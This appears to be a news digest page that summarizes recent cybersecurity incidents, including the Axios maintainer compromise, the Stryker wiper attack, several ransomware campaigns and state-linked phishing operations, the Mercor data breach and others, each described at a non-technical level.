VulnHub

The Axios HTTP client development team reported that one of their developers fell victim to a social engineering attack, likely orchestrated by North Korean hackers. The attackers used a fake Teams error message to gain access to the maintainer's account, which allowed them to compromise the project. This incident raises concerns about the security of widely-used open-source software, as it demonstrates how easily social engineering tactics can lead to significant breaches. Users and developers of Axios should be aware of these tactics and implement stronger security measures to protect their accounts and projects. The incident serves as a reminder of the persistent threat posed by state-sponsored hacking groups.

A breach involving the European Commission's cloud infrastructure has resulted in the exposure of sensitive data from at least 30 EU entities. The incident was linked to the TeamPCP hacking group, which is known for targeting various organizations. CERT-EU, the Computer Emergency Response Team for the EU, confirmed this breach and made the information public on March 27. This incident raises significant concerns about the security of sensitive government data and the potential for further exploitation of the exposed information. Organizations within the EU must assess their security measures to prevent similar breaches in the future.

Stryker, a prominent medical device manufacturer in the U.S., has announced that it has fully resumed operations after a cyberattack attributed to the Iran-linked hacktivist group Handala. The attack, which occurred three weeks ago, resulted in the wiping of several of Stryker's systems, disrupting its operations. This incident raises concerns about the security of critical healthcare infrastructure, as such attacks can impact patient care and safety. Stryker's swift recovery is a positive sign, but it highlights the ongoing risks that companies in the healthcare sector face from cyber threats. As the industry becomes more reliant on digital systems, securing these networks is increasingly crucial.

Recent findings show that the Akira ransomware group has become more efficient in executing attacks, significantly shortening the time it takes to compromise systems. This development poses a serious risk to organizations, as attackers are now able to exploit vulnerabilities and deploy ransomware more quickly than before. The report from CyberScoop indicates that businesses need to be increasingly vigilant, as traditional defenses may no longer be sufficient against this evolving threat. Companies are urged to review their cybersecurity measures and ensure they are up to date with the latest defenses to mitigate potential attacks. The growing speed of these intrusions could lead to increased financial and operational damage for those caught off guard.

A recent campaign has seen threat actors impersonating CERT-UA, the Ukrainian Computer Emergency Response Team, to distribute AGEWHEEZE malware. This operation has targeted around 1 million users across various sectors, including government, healthcare, education, and finance. By masquerading as a trusted entity, the attackers aim to deceive users into downloading the malicious software, which can lead to data theft and other security issues. The scale of the attack is concerning, as it affects critical sectors that handle sensitive information. Users in these fields should be particularly vigilant about the sources of software downloads and ensure they are only using verified channels.

A recent study by GreyNoise has revealed that a significant portion of malicious online activity, about 39%, comes from home networks, likely linked to residential proxy services. These proxies allow users to mask their true IP addresses, making it harder for security systems to identify and block malicious traffic. This trend poses a challenge for companies trying to maintain accurate IP reputation systems, as the line between legitimate and malicious traffic blurs. As residential proxies become more common, organizations may find it increasingly difficult to protect themselves from various cyber threats. This situation raises concerns for businesses relying on IP reputation to manage online security.

Recent analysis has revealed that a malware known as Chaos is now targeting 64-bit Linux servers, primarily associated with groups linked to China. Researchers found that these attackers are employing a two-pronged strategy: one that acts quickly and another that allows for longer dwell times within compromised systems. This dual approach not only increases the chances of successful infiltration but also makes it harder for organizations to detect and respond to the attacks. Given the prevalence of Linux servers in various industries, this development poses a significant risk to a wide range of businesses, potentially leading to data breaches and service disruptions. Companies using Linux servers are urged to enhance their security measures to defend against this escalating threat.

A Chinese cyber group known as TA416 has been targeting European government and diplomatic entities since mid-2025, resuming its activities after a two-year lull. This campaign employs malware like PlugX and uses OAuth-based phishing techniques to compromise systems. TA416 is linked to various other hacking groups, including DarkPeony and RedDelta, indicating a broader network of cyber threats. The resurgence of these attacks raises concerns about the vulnerability of government institutions in Europe, especially given the increasing geopolitical tensions. Authorities and organizations need to bolster their cybersecurity measures to protect sensitive information from these state-sponsored actors.

North Korean hackers have launched a significant spying campaign aimed at South Korean companies, according to researchers from FortiGuard Labs. This operation leverages GitHub, a widely used platform for software development, to facilitate their espionage activities. By creating malicious repositories, the attackers are able to trick employees into downloading harmful code that compromises their systems. Companies involved in critical sectors such as technology and defense are particularly at risk. This incident raises alarms about the ongoing threat posed by state-sponsored hacking groups and highlights the need for stronger cybersecurity measures among targeted organizations.

The Qilin ransomware group has targeted Die Linke, a German political party, causing significant disruption to its IT systems. This attack not only resulted in a systems outage but also included threats of leaking sensitive data. The party confirmed that data had indeed been stolen during the breach. This incident raises concerns about the security of political organizations, especially in light of upcoming elections and the potential for sensitive information to be weaponized. As cyberattacks against political entities become more common, the implications for privacy and security in the political arena are increasingly serious.

Mercor, an AI firm, has confirmed a significant data breach linked to a supply chain attack involving LiteLLM. Hackers claim to have stolen 4TB of sensitive data, which may include internal systems and proprietary information. This breach raises serious concerns about the security of supply chain processes, as attackers often exploit vulnerabilities in third-party software to gain access to larger networks. Companies that rely on LiteLLM and similar technologies should be particularly vigilant and assess their security measures. The implications of such a large data theft could be severe, affecting not only Mercor but also its clients and partners who may be at risk of data exposure or further attacks.